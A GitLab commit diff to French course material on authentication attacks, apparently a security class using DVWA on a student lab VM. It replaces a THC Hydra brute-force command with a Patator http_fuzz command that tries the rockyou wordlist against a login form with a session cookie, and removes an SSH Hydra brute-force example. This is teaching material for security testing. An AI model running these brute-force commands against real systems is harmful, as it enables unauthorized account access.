Skip to content
Snippets Groups Projects
Commit e7a3ba5b authored by Vincent Mazenod's avatar Vincent Mazenod
Browse files

update authentication

parent 2dda894e
No related branches found
No related tags found
No related merge requests found
......@@ -316,31 +316,30 @@ Note:
* [John the Ripper](http://www.openwall.com/john/) permet de générer des mots de passes dérivant de parties du username
## [THC Hydra](http://www.thc.org/thc-hydra/)
## Brute force [Low]
* multi-protocole: IMAP, SMB, HTTP, VNC, MS-SQL MySQL, SMTP, SSH, VNC, Asterisk, ...
* [RTFM](https://github.com/vanhauser-thc/thc-hydra)
* [liste de usernames](https://raw.githubusercontent.com/maryrosecook/commonusernames/master/usernames.txt)
* [liste de mots de passe](https://wiki.skullsecurity.org/index.php?title=Passwords)
```shell
hydra -l admin \
-P /usr/share/wordlists/rockyou.txt \
vm-etu-vimazeno.local.isima.fr \
http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: PHPSESSID=i2co2g99ve46qg39rf1bliic7h; security=low;:Username and/or password incorrect."
```
* [THC Hydra](http://www.thc.org/thc-hydra/)
## [THC Hydra](http://www.thc.org/thc-hydra/)
## Brute force [Low]
```shell
hydra 192.168.1.26 ssh2 -s 22 -P pass.txt -L users.txt -e nrs -t 10
patator http_fuzz method=GET follow=0 accept_cookie=0 --threads=1 timeout=10 \
url="http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login" \
0=/usr/share/wordlists/rockyou.txt \
header="Cookie: security=low; PHPSESSID=i2co2g99ve46qg39rf1bliic7h" \
resolve="vm-etu-vimazeno.local.isima.fr:10.16.41.197" \ #buggy version https://bytemeta.vip/repo/lanjelot/patator/issues/174
-x ignore:fgrep='Username and/or password incorrect.'
```
* attaque du protocole ssh sur le port 22
* 10 threads à la fois
* essaie toutes les combinaisons possibles entre les username de users.txt et les mots de passe de pass.txt
* + mot de passe vide
* + mot de passe = username
* + mot de passe = username à l'envers
* [OWASP - Testing for Brute Force](https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29)
Note:
- Burp Suite
- Patator
* [patator](https://github.com/lanjelot/patator)
## attaques offline
......
......@@ -4,4 +4,6 @@ default language in kali : https://www.youtube.com/watch?v=zCzxXc2SJ6Y
firefox / burp suite / kali / https://www.youtube.com/watch?v=Uzy28osev5g
simple api project / https://developer.okta.com/blog/2019/03/08/simple-rest-api-php
https://github.com/onhexgroup/Vulnerable-WordPress
\ No newline at end of file
https://github.com/onhexgroup/Vulnerable-WordPress
https://medium.com/@dannybeton/dvwa-brute-force-tutorial-low-security-463880d53e50
\ No newline at end of file
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment